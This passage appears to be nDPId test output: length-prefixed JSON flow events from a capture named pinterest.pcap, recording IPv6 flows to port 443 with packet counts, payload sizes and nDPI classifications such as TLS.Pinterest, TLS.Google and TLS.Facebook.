port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} +00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 